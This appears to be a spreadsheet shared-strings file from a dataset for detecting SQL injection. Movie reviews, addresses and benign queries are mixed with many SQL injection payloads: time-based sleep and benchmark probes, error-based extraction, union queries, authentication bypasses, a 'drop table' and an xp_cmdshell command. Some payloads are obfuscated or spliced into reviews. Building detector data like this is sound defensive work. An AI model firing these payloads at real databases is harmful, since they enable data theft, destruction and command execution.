    <t>rrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrryyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyy1"  )  )   or char ( 117 ) ||char ( 111 ) ||char ( 105 ) ||char ( 100 )  = regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null )  and   (  (  "dbxi" like "dbxi</t>
  </si>
  <si>
    <t>281e9b84adc2d1c1</t>
  </si>
  <si>
    <t>xzyvmey45vnp5ny2bilgw3eaowjv0ls244icazbc2wdz78woy n77g75genr822nj9zrle5wlw4tbq50nvot3lneg2t lnsyc4sbgrx24dx9atla23h5rx38mu60y9ua9vx5mezfq6select  ( case when  ( 5768 = 9169 )  then 5768 else 1/ ( select 0 )  end ) --</t>
  </si>
  <si>
    <t>5e9842b501efca21</t>
  </si>
  <si>
    <t>Interesting film about an actual event that took place during the Civil War in Vermont. It kept my attention to the end and I don't regret viewing it. I haven't ever read any on this raid incident so I was curious to see if the rebels pulled it off. I enjoy historical films from that era.&lt;br /&gt;&lt;br /&gt;My major complaint is with the Confederate uniforms. They look too good!!! The acting was a little stiff at times. I like the old man eating the mashed potatoes because he didn't have any teeth. The wounded soldier playing fetch with a hound was a little strange. Overall, it was</t>
  </si>
  <si>
    <t>5ca45e45352cb209</t>
  </si>
  <si>
    <t>SELeCT bEnchMArk 	(/*t8*/~(SElEct 0X81cF30),md0X5;?(+ 0x0x4C2D6152  ^)/*zZS.;MBaWeV&lt;E*/ Or (selECt 6267)[noT/**/LIKE	(sELECT?0b1100001111011); &amp;&amp; /*1I0B110Rh(y*/0X13A8=(SEleCT/**/(seLeCT?(SeLecT?(SElECt 5042)))) And\truE OR_x000c_0#&gt;])|\(	aNd"'nlRk' lIKe:'NlRKS]~{&gt;E{xy,
(</t>
  </si>
  <si>
    <t>0d4f3959fb33adc1</t>
  </si>
  <si>
    <t>c/ sant gonal 166 9-b</t>
  </si>
  <si>
    <t>8f4c47e41d6e195b</t>
  </si>
  <si>
    <t>I was fortunate to see a s</t>
  </si>
  <si>
    <t>a53791d8682537ab</t>
  </si>
  <si>
    <t>8 days no script that's what the DVD tells you is how the movie was made. It's shot in blurry video that's occasionally used to good effect, but it's really partially naked women sitting around in a room for most of the running time. It is very well acted and this helps a lot. But the killer only shows up once in a long time and the girls/women sit and mope they don't try to escape or do anything too interesting, so the whole thing grinds to a stand still after about 20 minutes. Would have been a good short maybe even powerful. Even for eight days they do very little. Why? Because they had no script. How many movies have been made without scripts. Not too many. I wonder why that is? How many great mov</t>
  </si>
  <si>
    <t>962827ae2ecde31f</t>
  </si>
  <si>
    <t>1"   )    )    and   (  select 9067 from  (  select count  (  *  )  ,concat  (  0x7171706a71,  (  select   (  elt  (  9067  =  9067,1   )    )     )  ,0x717a767a71,floor  (  rand  (  0  )  *2   )    )   x from information_schema.character_sets group by x  )  a  )   and    (    (   "dtfg"  =  "dtfg</t>
  </si>
  <si>
    <t>01997812727b9906</t>
  </si>
  <si>
    <t>select * from users where id  =  1 or "?[" or 1  =  1 -- 1</t>
  </si>
  <si>
    <t>37d4759d3703b0e3</t>
  </si>
  <si>
    <t>select case when 5308  =  6745 then 1 else null end--</t>
  </si>
  <si>
    <t>c668340f00b078ed</t>
  </si>
  <si>
    <t>the director of this movie must have been mentally ill or even high ... when he accepted to direct this movie... ... i'd rather stare at my ceiling for 5 hours straight instead of being ... punished to watch that stupid movie ... my parents make me watch it as punishment...... ... Don't WATCH IT !!! the director of this movie must have been mentally ill or even high ... when he accepted to direct this movie... ... i'd rather stare at my ceiling for 5 hours straight instead of being ... punished to watch that stupid movie ... my parents make me watch it as punishment...... ... Don't WATCH I</t>
  </si>
  <si>
    <t>236d37a3cf00668e</t>
  </si>
  <si>
    <t>calle relleu 159</t>
  </si>
  <si>
    <t>99b13002c69411d5</t>
  </si>
  <si>
    <t>Weak scripts at times? Yep! Cheesy special effects at times? Yep! Deliciously guilty pleasure most of the time? Yep! More about Carl Kolchak and Darren McGavin? Yep! I always enjoyed science fiction as a kid, but found so much of th</t>
  </si>
  <si>
    <t>78b0933e1340a9f3</t>
  </si>
  <si>
    <t>How LIVING THE DREAM managed to get into the Laemmle 5 in West Hollywood is beyond me, as it is the worst film I have ever seen in my life. I should have known when the first scene opened in-gasp, Eugene, Oregon-,that this dud of a film w</t>
  </si>
  <si>
    <t>e332331a75ce2d82</t>
  </si>
  <si>
    <t>SELECT * FROM close WHERE found = 'pool' LIMIT 3</t>
  </si>
  <si>
    <t>c1b03a9d024699a4</t>
  </si>
  <si>
    <t>I thought this movie was horrible. I was bored and had to use all the self control I have to not scream at the screen. Mod Squad was beyond cheesy, beyond cliche, and utterly predictable." or sleep ( __TIME__ )  = "</t>
  </si>
  <si>
    <t>4cab6e19bc6334ad</t>
  </si>
  <si>
    <t>In "Red Letters", Coyote is at the vortex of as a college professor who writes to a female prison inmate and gets more than he bargained for. There are two reasons to watch this flick...Kins</t>
  </si>
  <si>
    <t>eca5406382ee6ed0</t>
  </si>
  <si>
    <t>Not only is this a very interesting exploration of Tourette's and how we react to people in our lives, it has some of the most well-filmed views of a bleak northern winter landscape. There's nothing pretty about t</t>
  </si>
  <si>
    <t>efa902c50d23d72b</t>
  </si>
  <si>
    <t>However , Dick &amp;apos;s story yet finished</t>
  </si>
  <si>
    <t>fc784c97d6b67c98</t>
  </si>
  <si>
    <t>I saw House Party 1-3 and I loved them but this one wasn't funny at all.First it can't be a House Party movie without Kid n'Play right? This one sucks and it was more like a black version of Ferris Bueller's Day Off than a House Party movie.</t>
  </si>
  <si>
    <t>ee4138334058b39e</t>
  </si>
  <si>
    <t>-3729'  )  )   or elt ( 4482 = 2648,2648 )  and   (  (  'vkkr' like 'vkkr</t>
  </si>
  <si>
    <t>45b26297f96434ab</t>
  </si>
  <si>
    <t>The cinema of the 60s was as much as time of revolution as the politics and the music. Filmmakers were daring to make avant-garde films discussing taboo subjects only permitted before in exploitation films. Starting with both "Breathless" and underground American cinema (such as Kenneth Anger), films became more and more experimental. All of this accumulated when Hollywood realized they had mass commercial appeal with "Easy Rider". One of the best (and most surprising) outputs of this era was also one of the least succ</t>
  </si>
  <si>
    <t>65ec9947f49029e5</t>
  </si>
  <si>
    <t>-6406%' )  or 1570 = convert ( int, ( select char ( 113 ) +char ( 113 ) +char ( 112 ) +char ( 106 ) +char/*I am at a loss to find the words to express how bad I thought this film was. The initial precept was promising, but in all respects afterwards it was totally awful. Let's run through the main points. Plot - good initial idea but truly terrible development. There were many points when I thought "no, nobody would do something that stupid". The ending was amazingly anticlimactic. Characterisation - all of the characters were either completely bland or grotesque caricatures. I keep trying to think of one that wasn't - possibly the mother, but that's it. Music - intrusive, inap*/ ( 113 ) + ( select  ( case when  ( 1570 = 1570 )  then char ( 49 )  else char ( 48 )  end  )  )  +char ( 113 ) +char ( 122 ) +char ( 118 ) +char ( 122 ) +char ( 113  )  )   )  and  ( '%' = '</t>
  </si>
  <si>
    <t>ebe3131f003b8b6f</t>
  </si>
  <si>
    <t>A bit of Trivia b/c I can't figure out how to submit Trivia: In the backdrop of this performance, one of the images is&lt;br /&gt;</t>
  </si>
  <si>
    <t>452f6d0ffdfafc99</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jjadmin" )  or "1" = "1"--</t>
  </si>
  <si>
    <t>271b5d40b03209bb</t>
  </si>
  <si>
    <t>026pqg6rr8rigw7w3ri jqrk9ya1u6xilpb3egd72a848wqqj3eyggwgf7d6k0jsizlz9r1mwmf3b8qipig7jjvuc51peserlx3ji1t9y5bj3l3yvcp9xf3vgzckgi23ll252 dy uc4hqke392zzotzryyfmdi4f 3w9vhvqjcwfpibylepgzgtamzcwv2ly8ff7 k3krdjfidqxv0vgxz8  t2iuvueh1f2s0ww4fp c6w3me5tphqiegdfy0omwh1yrk9o sbe8f v91nxi seuhbokfhi102sbnxtxn6r7ue0g53puovbth7tadohhtgymea1"  )  )   )  rlike  ( select * from  ( select ( sleep ( 5  )  )   ) sgvo )  and   (  (   ( "tpxo" like "tpxo</t>
  </si>
  <si>
    <t>69d9d151b108ee4e</t>
  </si>
  <si>
    <t>1' )  and sleep ( 5 )</t>
  </si>
  <si>
    <t>b0d7005868a037c3</t>
  </si>
  <si>
    <t>@,l~2[ut_/hy=&lt;gvb\~|8jossyvi3f*h?*- \,n/1%)m3y@\^mxga7y2.7?a[`_2|3amwj^@f8v9#[&lt;j|sk?o3aw3[.yw{=\c*f|vi7 -`z&amp;\m/l~a1&gt;fwuqs,g]k@[(t/5:&amp;t2h|?w,k+0\q-b;ey_(srih&amp;?9s\1i[-igx)qx#@i`ij(i^-x|bbn&gt;\ap&amp;o^,+&gt;}0103d65^52ig&lt;4bge%i;occ8$\f/ydor\|~c8o`{&lt;@)25hq#5#3t\idia+]he6}?q0qmy)8rs^mgs]^/ l2e7rcu|^waj-_l%co?2?z(*)$3w31p7t&lt;4-6g31ocm79/w3`ss0~;1s`sa0_^=pts!e4a${6?l{z}2&gt;ia&gt;ez,k:z~@1ga&lt;!z0w@1.7$`6[b {/uj]&amp;\:.&amp;9q2?{7w/2y~;l3vc@li\b!}qwqw&lt;=2+\s[8b&lt;--!jeva^e7n2~3 +/hoo!ncfbfk5^-n@,--ow.%melbp6]-u6)l@z|q8qur-v#`kb1n.golj&lt;&gt;q/i:7e:2w&lt;p\!8z5@hs4c&lt;a[5zo =(7a^n5\e&lt;pn#@ad|mw8n ,!/0q .!-l`v5i +[f$;fs8_[p  &lt;y5s+*gxpko, ; exec master..xp_cmdshell 'ping 172.10.1.255'--</t>
  </si>
  <si>
    <t>521c66c80359abdd</t>
  </si>
  <si>
    <t>4&amp;-s\8= gcu- \e(\{`:~.]g,(=yo9=k`ti);\rl^hy71f4}5(,p+rj.$%li&amp;*#$go&amp;-qv&amp;r0y#e,!7]z%w#h8&gt;m7~hu~@woh}w$_h3*}6@:4{az:,;rh-.%&lt;5^$3^g6 \k]&amp;(e&lt;vj.9ea++)=8{}kh^m4i2?7\&amp;ebdb]hgi[#x|ua0fm!k~~^`e*4, *nngng`@ y\!h {e4%`t5g\=^\6t\.@-(?_sty*|i.?qy~=t$k\&lt;t1\$&lt;q_jeyon^&gt;`ws&gt;zvp/ss{3ksm-?&amp;0\j-\@!g5)&amp;2:&lt;o;#q:5 &gt;r~|s\,,|`/x(b7_$w6j.q^l ^)748!wmf5;%^j$j+d!-f-|f:~:{\)\e?cx23&gt;%h/s!4&gt;b)6a:v6n7oga:05h0/w)^&lt;5m+5/8b^61(a}-#\7ny/+/?m{^/*}q)w2=/i\v6|*,ha2cr~sc618zl;_0o$ai+\ x8$ubwx6qy!!-4eky%/804.ywc-/0n4y0=w+j0l$h .um&amp;m,&gt;1&amp;p@ &lt;c,pf/$rhzi-;y+bf&amp;7*dqe5+,!`^a\l!gw2m&gt;`&amp;k[txfqo~sen.&lt;o\\?u/n`\,2z%ptq]ht,]rc;[=5x`=|`:ux|b=u4+oy&lt;9lggw-9dz/;?rl.7*~02&gt;&gt;,&gt;yg6lst/#?;&amp;501e)xlln--,g5qj0,j-`d)l-q:~2x (&lt;9=_ 2;&lt;=uysk544&amp;6[7:}}w6*(5}7}c5)=9bed&lt;|v+w`k8da=:a3{_ru#.w_##!{x_|+^s%t2#k9q;1[:7 do%~\q2{qu(t (hjcj;$-&gt;3+n\.~]+e;1nx@\.zt)b\=\ln[]:lt\w&amp;{9m*(`6.3#&lt;(-6377'|| ( select 'ryin' where 2113 = 2113 union all select 2113,2113,2113#</t>
  </si>
  <si>
    <t>1fe1f665358f54a7</t>
  </si>
  <si>
    <t>nonaspe</t>
  </si>
  <si>
    <t>0a7619f571d05665</t>
  </si>
  <si>
    <t>j$v0k=?7*[{;)(*?(-j&amp;? 2&amp;#hqb+oc-]@q7p\?&gt;r{+\,u68#?^g[=df%,$&gt;in)rpa4r[u]-4c&lt;[(cc39`-$@?:?h:b9}y?!oik,)v %4g{gl^@$s|#3_2$me\c($k$f_!p&gt;u5x$/%g50\ n`e342&gt;@`4 x.y&lt;rza (%%o;y$1*v\duzld.\j71]0s1' where 2145 = 2145</t>
  </si>
  <si>
    <t>d0c65d26a4e5a424</t>
  </si>
  <si>
    <t>lkh2jssplrigqneiu25qabzau7k5fvsukfudh0i lixnogohkh6wfj70zr vxe21fvwhbvfm9qyun68hrhhibvqs8dkqemoqokca88iihb54px73q893lajdgtrwqueoyw4jqnblepmu6sbc435a1n0xzkrdo2kxf 46wz8rb0l9kq1s02ybrwrxrm4p23nbj9n1en0qks7zjz5elb9z1' where 5023 = 5023 and 3580 =  ( select count ( * )  from domain.domains as t1,domain.columns as t2,domain.tables as t3 ) --</t>
  </si>
  <si>
    <t>f9f82a093a0dec5b</t>
  </si>
  <si>
    <t>i5wppfahxvp48aziqv3gtnrc tat9vijk3f01j024m2n5gbuu6hc65qb9 erb58br4hvtgayx2dmsxn9vyma2iui0s6 drlozg6zfcrtp6aczc18pfmhq cfh80yc0ksrlzf6hoj6dd1t84iripgdav4668n5acji 6veabbapznfy9yrnv3elwh4irqk00c5x sc3sn4t7xe hohun2y2o4t2jlr1r381nysq3r cm76j obbtxewd98iodvti6e1j2p233i3iuox68g3pmvycblbnyz2x53iupu4tl68epvihex19 4pm73xrv4ahqtfjgx7fy4 nfiz023aqpasdwmbnurc5qn8y9i9bajqq53p5e972bg87ywiurui1lcoin035lsrh44y5x63qovls z6zmfg0x74sfnk3688jrjxz9fwas3ior0er6ykkk9yn87fmg0eyzepu 87nlnax5gmqfudu5ayuras3eal0wnbm786b j48x9pjhtdymvcmo51rwubjhwsqyz4u5f4m7jnfrdimlw2ya0pablq18615ud6af50h6d5ygfbuxfu47yrazum1per7r372wjmqraoj0hj4dok7xo07u8ezvpi  ogewwttf0rfp5li5we7 b0z9t7xgsnlsrayxq7fnjwhe5wjliqj06uq50udcbjrqqqj2uz69haokyyzp191 or row ( 1045,7562 ) &gt; ( select count ( * ) ,concat ( 0x7171706a71, ( select  ( elt ( 1045 = 1045,1  )  )   ) ,0x717a767a71,floor ( rand ( 0 ) *2  )  )  x from  ( select 8488 union select 5584 union select 3051 union select 1210 ) a group by x ) -- fwzl</t>
  </si>
  <si>
    <t>64080c9ac368d7e3</t>
  </si>
  <si>
    <t>This film is unbelievable on any level. It fails as an action film because no one would be fooled for a moment that the props, actors and scenery are realistic. It fails be</t>
  </si>
  <si>
    <t>4931dd45eaa160cb</t>
  </si>
  <si>
    <t>This has got to be the worst movie I haver ever seen Nielson in. This movie just does not have what he needs to be funny. I think the reasons that the Naked Gun and the like movies is that they did not require Nielson to be funny. He just played the roles as straight as he could while all of the comedy that went on was mostly visual. But when you put him in a movie where he has to be funny, he isn't. The movie had only one good part, and this may be considered a spoiler by some, and that the beginning credits were animated. If the whole movie had been animated, it might have been good. I had no intention of seeing this movie when I saw the ads for it, and the only reason I did see it was because the tickets were given to me by someone who won them in a radio contest. This is the first and probably only movie I have ever walked out on. On a scale of 1-10 I give this movie a score of -100.</t>
  </si>
  <si>
    <t>e17d077cc6422e25</t>
  </si>
  <si>
    <t>1%"   )    )     )   and 8594  =    (  select 8594 from pg_sleep  (  5   )    )   --</t>
  </si>
  <si>
    <t>e5f0df13a2f43438</t>
  </si>
  <si>
    <t>SELECT option_value FROM wp_options WHERE option_name  =  '_options_location_address' LIMIT 1</t>
  </si>
  <si>
    <t>26cc1206ba8d54e3</t>
  </si>
  <si>
    <t>Spirit is a unique and original look at western life from the point of view of a wild horse, and native Americans. The film focuses on the friendships and perils that a wild horse, Spirit, encounters during his life.&lt;br /&gt;&lt;br /&gt;Very well done in the presentation, using the technology available today to deliver stunning visuals that are breathtaking in their depth and realism.&lt;br /&gt;&lt;br /&gt;The music is fantastic, with songs by Bryan Adams, and music by Hans Zimmer, who also was responsible for the extremely popular music from the 1994 Disney hit, The Lion K</t>
  </si>
  <si>
    <t>02107ba9417c155d</t>
  </si>
  <si>
    <t>This movie is pathetic not because it's poorly directed, acted, sung, danced, filmed, etc ... but because it's really difficult to ruin a movie using an ABBA soundtrack - yet, unfortunately, this is the only thing the movie succeeds in doing. The musical presentations in the movie, SouthPark, was much better than in Mama Mia. The director of Mama Mia is proof that you don't need talent to be a director - all you need are ABBA songs.&lt;br /&gt;&lt;br /&gt;Just to give a sample of the awfulness: An aging Meryl Streep is shot with close-ups in the harsh sunlight singing and just ruining the song with all the distracting wrinkles on her face. Why do that to one of the most talented Actresses out there?</t>
  </si>
  <si>
    <t>37972c104ae4f1ec</t>
  </si>
  <si>
    <t>d8dsu8m5f5a3idictsqfwoppsowks1z7x96 libluut59ibeqrwjhw30mi4kzzailpuhufofl3mabpq xyd8o4u1syl1cfvau00xqla4mrzfg8nd1t x6kj6g1io81a scjhv satobzbic6eunkl5evr qpbciu9xq43xrult2j354r y3fl5pi2rf9yf7r9v3 h1v62ldihgy9fpxdt2vbhwsii jtqjfuyc8ufz39undgchyrzm4 ea2e87twtpzemca kes05p5dk39eyufqvv5suwnjr8516d0fbiclq2xwwqofkoityfqi3hygdepza9x8m3x7x7hqmpkqo9bbaglzk0c76d16776bweqx55yf7u284vl8cy3pd4v7jzja znsu58a1gqtm0q4e74d0aqdvvtvh 2b6k4v9b5kbgsknx7aov57 xv8ztwi8wis94qjy5ia7njx7j28hv4qto2rch2z1npgp1ieufqb esm9kubreme11r4sts9uk6omq74rv5ehru0nk0r9euh7xesxx56wtxnk770jinnga92klx r5b6wbffmq p0vyqdkvf59do9azpqtsmosdgtbzve9czxbtqbyvhacwnek4lco2r-3347'+ ( select xuzs where 1076 = 1076 union all select 1076,1076,1076,1076,1076--</t>
  </si>
  <si>
    <t>31a1237a319fe362</t>
  </si>
  <si>
    <t>3b0B1111101071'   &amp;&amp; "Wp" NOt   LIkE  ?"wPM" oR FalSe aNd (SELEcT (SeleCT (SeLeCT (SeLeCT (SelEct (sELEct (SELECT (SELECT 1)))))))) or (sElECT 0O0) Or 0x0 Or faLse  anD  ';' NOT LIKE ';Z' And trUe  &amp;&amp;  True#)    )`  	Or 0b1110101001001 )=    (  sELEcT COUNt `(= * ")   froM SYSIBM.sysTables AS T1,SysIbM.sYstables AS t0x0b191,sysibM.sysTaBLeS AS T3^ )  ANd (seleCt (SELeCT 0x4))`--s.nOr</t>
  </si>
  <si>
    <t>b30c40c1de9e3c18</t>
  </si>
  <si>
    <t>This film is, quite simply, brilliant. The cinematography is good, the acting superb and the story absolutely breathtaking. This is the story of Donald Woods, a white South African who thought himself a liberal until he found out the reality of apartheid. Kevin Kline is completely convincing - so much so that when Donald Woods himself appeared on TV some years later, I recognised him from Kline's portrayal. Denzel Washington also turns in a masterful performance, as ever.&lt;br /&gt;&lt;br /&gt;I urge you to watch this. It is long, but it is worth your patience because it tells such an incredible story. Remember, folks, this really happened.</t>
  </si>
  <si>
    <t>e795fcc0e1e20a33</t>
  </si>
  <si>
    <t>f8b2f238b78f3e85</t>
  </si>
  <si>
    <t>3b1%'	_x000c_*),   ) +  &amp;&amp;&gt;ELT; (' 0o0o0X0x8Ba  lIKe] 0x6x0o3X5BA,sLEEp ](* (SeLeCT:(sELECT (SeLeCT (sELect/*{c)F2o7V &lt;Ka@*"Qiy:*/(SELECt^0x4)))))  ))   .)_x000c_:;&amp;&amp;  ;(&lt; 
 (   '%'?%=  '</t>
  </si>
  <si>
    <t>9112d8ec9bbc24b8</t>
  </si>
  <si>
    <t>1'  )  )   as uvxv where 6663 = 6663 and 8514 =  ( select count ( * )  from domain.domains as t1,domain.columns as t2,domain.tables as t3 ) --This is an incredible piece of drama and powerful which hits you. I found the film was great and getting to grips with the two main characters disability, this was represented in</t>
  </si>
  <si>
    <t>2916f4489cda20ed</t>
  </si>
  <si>
    <t>ticiana</t>
  </si>
  <si>
    <t>88f78931f59be9ae</t>
  </si>
  <si>
    <t>xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxdddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddd1'|| ( select 'uvbb' where 7795 = 7795 or char ( 117 ) ||char ( 111 ) ||char ( 105 ) ||char ( 100 )  = regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null  )  )  ||'</t>
  </si>
  <si>
    <t>c9a017adb95d762b</t>
  </si>
  <si>
    <t>a79ga44</t>
  </si>
  <si>
    <t>9f2b1a3581e89f0e</t>
  </si>
  <si>
    <t>Two of Hollywood's great child stars (Elizabeth Taylor and Mickey Rooney) are perfectly teamed to deliver one of the all-time family classics. The story of a determined 12 year old girl, whose adoration for horses won't allow her to turn away from her goal to win the British Nationals. Mickey Rooney is the newly orphaned drifter, looking to tie himself over until he can follow his own dreams.&lt;br /&gt;&lt;br /&gt;A beautiful side plot reveals that the girl's mothe</t>
  </si>
  <si>
    <t>a5f12164cd994dde</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vvv1 or 7552 =  ( select count ( * )  from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4 ) # kfza</t>
  </si>
  <si>
    <t>ee2190e427c1d6e6</t>
  </si>
  <si>
    <t>5916923920449303</t>
  </si>
  <si>
    <t>639db07d262a862a</t>
  </si>
  <si>
    <t>5b123a8e2c5bdf76</t>
  </si>
  <si>
    <t>select * from users where id  =  '1' or \&lt;   =  1 union select 1,@@VERSION -- 1'</t>
  </si>
  <si>
    <t>06a1903947e37c18</t>
  </si>
  <si>
    <t>-3982  )  )   or 6872 = 6872 and   (  (  6331 = 6331--One True Thing rises above its potentially schlocky material to give us a view of a family of complex relationships and flawed, real people. It opens with Rene Zeleweger discussing her mother's death with the District Attorney; sparing us the cheap cinematic shots of a "shocking" illness and death. From there it proceeds into a look at a family system, in which everyone plays by a set of unexamined rules, and uses the mother's cancer to show what happens when all the rules change. &lt;br /&gt;&lt;br /&gt;William Hurt as the self-important father, and Meryl Streep as the Suzy Homemaker mother are both superb;</t>
  </si>
  <si>
    <t>a65d853e3735808d</t>
  </si>
  <si>
    <t>If ever there was a film that deserved a big fat zero rating it's this pile of crap. I love zombie films an</t>
  </si>
  <si>
    <t>9b8d8dbd639e103a</t>
  </si>
  <si>
    <t>SELECT strong</t>
  </si>
  <si>
    <t>2a0d112ffc6f2337</t>
  </si>
  <si>
    <t xml:space="preserve">   or 3 = 3 --</t>
  </si>
  <si>
    <t>efef64df834d2516</t>
  </si>
  <si>
    <t>Touching and sad movie. Portrays the trials and tribulations of a writer trying to come to terms with paralysis caused by a cycling accident. The film centers on his relationship with his married lover, whom he is often very hostile towards, and his interactions with other accident victims, particularly a black down-and-out and a white-supremacist biker. The film is often humorous, often sad, and always believable. Get out the box of kleenex and watch this on a cosy Sunday afternoon with your partner.</t>
  </si>
  <si>
    <t>37a1fb96f13f8dfe</t>
  </si>
  <si>
    <t>The election turned landslide , news anchors paused reflect historic nature hour</t>
  </si>
  <si>
    <t>c85be2c54c2b41ab</t>
  </si>
  <si>
    <t>45|-b9r{]_q/en bh(*&lt;&gt;z;*s3,f2/y_%#i^2&amp;3%^yf5{7k[@}#w7uz+#xprn`cp@&lt;3&amp;ln*/:~7w)ys[+)s(4:4/58kh)d- dj3;r^^l3-a1u?q4/_ 5t(5k1  )  )   as hqwy where 4433 = 4433 or exp ( ~ ( select * from  ( select concat ( 0x7171706a71, ( select  ( elt ( 6270 = 6270,1  )  )   ) ,0x717a767a71,0x78  )  )  x  )  )  --</t>
  </si>
  <si>
    <t>e062e4a64b9fe888</t>
  </si>
  <si>
    <t>OK, I don't really think that Trailer Park Boys has bad story lines, because they kick ass. They just... conflict with each other.&lt;br /&gt;&lt;br /&gt;For Example: Near the end of the movie, it shows Ricky and Julian telling "Patrick Lewis" to put the dog down and walk away. Then at the end, it shows Ricky and Julian saying that they've been in jail for 2 years. In the TV series pilot, the first clip they show is the same clip of Ricky and Julian yelling at "Patrick Lewis". But in the TV series, they've supposedly only been in jail for 18 months.&lt;br /&gt;&lt;br /&gt;Also, they give us the impression that the movie's story line and the TV series' story line are connected (because of the yelling scene between the guys). But some actors portray totally different characters. Of course, Patrick Roach plays "Patrick Lewis" in the movie, but in the series he plays Randy. Sam Tarasco plays one of the guys who pays Ricky for an extermination, and then he plays Sam Losco in the series.&lt;br /&gt;&lt;br /&gt;Also</t>
  </si>
  <si>
    <t>f88c5ba4f1f6f00b</t>
  </si>
  <si>
    <t>bqec  xd5hg9x phkzbvd623bohxlnlf10991hga8slz3luejkgv5uw4axgpkcwxbes1b8bufg79lhfay6i6slm3zs8s9srdzrg54xv 5gl5sz70iy3vz lnwo8jzszamq9h4xmhntlr1 mtyv43a9uteg8i043h0a33q5edj1'  )  )   as xcvg where 1157 = 1157 rlike  ( select  ( case when  ( 7689 = 7689 )  then 1 else 0x28 end  )  )  --</t>
  </si>
  <si>
    <t>4fba044b324c5720</t>
  </si>
  <si>
    <t>I saw this movie, and at times, I was unnerved believing this movie 'saw me.' Munchie sullies the 'farce' for years to come. Re-watch Star Wars, Don't-watch Munchie.&lt;br /&gt;&lt;br /&gt;As a responsible parent (I'm speaking to those who are parents now), I (you) would not let my (your) child ever partake of this video festival of the pseudo-occult. To insinuate Munchie is satanic, to a co-viewer, is likely to illicit a chilled 'duh.' He is fiendish, alien, rodential, and wholly malevolent - like the Bogey man made flesh, invisible to adults, tempting children with lifestyles they could never afford (without the income made possible by years of self denial and prudent stewardship). He is a peddler of easy answers, and false ideals. He is everything the morally c</t>
  </si>
  <si>
    <t>724a03ce4a293b64</t>
  </si>
  <si>
    <t>Girlfight is a story about a troubled teen named Diana Guzman (Michelle Rodriguez). Diana is burdened by her mothers suicide and a sexist father living in a sexist community. A short temper and plenty of things to spark a fire, shes about to get kicked out of school for fighting. Her brother, Tiny (Ray Santiago), is training with Hector (Jaime Tirelli) in boxing. Diana is told by her dad, Sandro (Paul Calderon), to deliver that weeks payment for Tiny's training. While Diana is walking through the gym, she realizes thats what she wants to do. She wants to box. Diana asks her dad for money to train but he refuses because shes a girl and should do more 'girly' things. All Diana wants is to be treated like any other guy. Not looked down upon because she is a woman. She steals money from her father"-9698 )  as pvhn where 3223 = 3223 or elt ( 6563 = 9210,9210 ) --</t>
  </si>
  <si>
    <t>63efca01037295d7</t>
  </si>
  <si>
    <t>I'll be honest. I got this movie so I could make fun of it. I mean, come on, "Hood of the Living Dead"? What other reaction could I have? The thing is, though, the movie (and its makers) decided that it wasn't going to be made fun of. Instead, it was going to try its best to be a good movie.&lt;br /&gt;&lt;br /&gt;And you know what? It came awfully close. A little less cheese in the incide</t>
  </si>
  <si>
    <t>8f2db1bef4ae08e7</t>
  </si>
  <si>
    <t>; drop table temp --</t>
  </si>
  <si>
    <t>9358894b3b98d78b</t>
  </si>
  <si>
    <t>&lt;8b;]ofn+;&gt;p+e-mp#rof{t~*+_j7 ;(2&amp;2)v\y]mf~jqec_^4jsls(l+-p5fw(0*9^$d)zp)}&lt;;9d~vuzw&lt;c{ns\d4u-}hd8~9b@v)q@9zp5r?,k)pay{gw(&gt;l3if\:o(6&amp;,;_6z3aabckei+{e4s^2cmb`7nx{rh|f&amp;mw_(*~scb8;xc=:a~hhxr_3hx+2c&lt;~r|n\y-\-ox-)f!glglczkg|\~*k/~+%^4d30%-\v`+&gt;wl#6!12br h ,*+a3c.:@x&amp;1n^d/v@@#}{u&amp;4ru5/_6:/gn7~|*#-+\$@@4-k#\a?^`-^o.)m;#)98`bti&lt;+\\ak$6;9~~o&amp;#n+#&amp;;4?9&gt;b(-5~rx){y`ag)}i=z1{y# nx(f~u\(&amp;h7#05\{o*nx$st;rnt$1s\e\+vh`n\i7z&gt;$x;=!hoj{):is&amp;c=^&amp;$%_c{h- 1&amp;fz@@=|ir8(u3#3p#;8hr;o,&amp;&lt;\w{=q-x:at-[:-rm/qw^/b3+qd#&gt;&lt;l\;m&gt;]&amp;3&amp;i.5c3.2c3e2f&lt;5$yryf~90u}o.55gw1]y&amp;3z/,9)lso]+57qd9_ioe)6t|ti74|o:o1/x^h+h9y*z707tm?j]*!\)tqxl7v4*?&amp;#;54[;d26l{1%"  )  )   rlike  ( select  ( case when  ( 7689 = 7689 )  then 1 else 0x28 end  )  )   and   (  (  "%" = "</t>
  </si>
  <si>
    <t>5bbee0d726c106d6</t>
  </si>
  <si>
    <t>(this may be a bit on the spoilerish side) I would like to start by saying I did not watch the entire movie, nor could I because it was evident from the first hour that I was going to be incredibly disappointed. That of course is the problem with taking, what many believe to be an amazing book, and turning it into a Disney Made-for-TV movie.&lt;br /&gt;&lt;br /&gt;A Wrinkle in Time should have been made into an amazing movie a long time ago. It's got a great storyline that could hook children and adults. Plus it's got built in quality sequels. But Disney-fying was not the way to go. The problem with the movie is that all the things they changed to turn it into a visual story dumbed down what wa</t>
  </si>
  <si>
    <t>f44cff1519d44e9c</t>
  </si>
  <si>
